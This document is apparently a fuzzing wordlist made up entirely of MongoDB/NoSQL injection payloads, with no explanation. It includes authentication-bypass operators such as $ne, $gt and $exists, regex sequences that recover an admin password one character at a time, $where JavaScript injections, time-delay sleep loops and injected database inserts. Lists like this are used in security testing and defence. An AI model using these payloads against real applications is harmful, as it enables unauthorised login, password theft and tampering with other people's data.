|| 1==1
{$nin: [""]}}
{$gt: ''}
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"user":{"$gt": ""},"pass":{"$gt": ""}}
{"$gt": ""}
{ $where: "this.credits == this.debits" }
{ $ne: 1 }
username[$regex]=^adm$password[$ne]=1
username[$regex]=.{25}&pass[$ne]=1
username[$regex]=.*&password[$regex]=.*
username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=md.*
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=b.{2}
username[$ne]=toto&password[$regex]=a.{2}
username[$ne]=toto&password[$regex]=.{3}
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$ne]=toto
username[$ne]=admin&pass[$lt]=s
username[$ne]=admin&pass[$gt]=s
username[$ne]=1$password[$ne]=1
username[$exists]=true&password[$exists]=true
username[$eq]=admin&password[$ne]=1
true, $where: '1 == 1'
tolkien’, $or: [ {}, { ‘a’:’a&password=’ } ],$comment:’successful MongoDB injection'
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
db.injection.insert({success:1});
admin' && this.password%00
admin' && this.password && this.password.match(/^duvj.*$/)%00
admin' && this.password && this.password.match(/^duvj78i3u$/)%00
admin' && this.password && this.password.match(/^c.*$/)%00
admin' && this.password && this.password.match(/^b.*$/)%00
admin' && this.password && this.password.match(/^a.*$/)%00
admin' && this.password && this.password.match(/.*/)%00
[$ne]=1
1, $where: '1 == 1'
, $where: '1 == 1'
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);
', $where: '1 == 1'
', $or: [ {}, { 'a':'a
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
' } ], $comment:'successful MongoDB injection'
' || 'a'=='a
' && this.passwordzz.match(/.*/)//+%00
' && this.password.match(/.*/)//+%00
$where: '1 == 1'
$or: [ {}, { ‘a’: ‘a’, password: ‘’ }], $comment: ‘successful MongoDB injection’ }
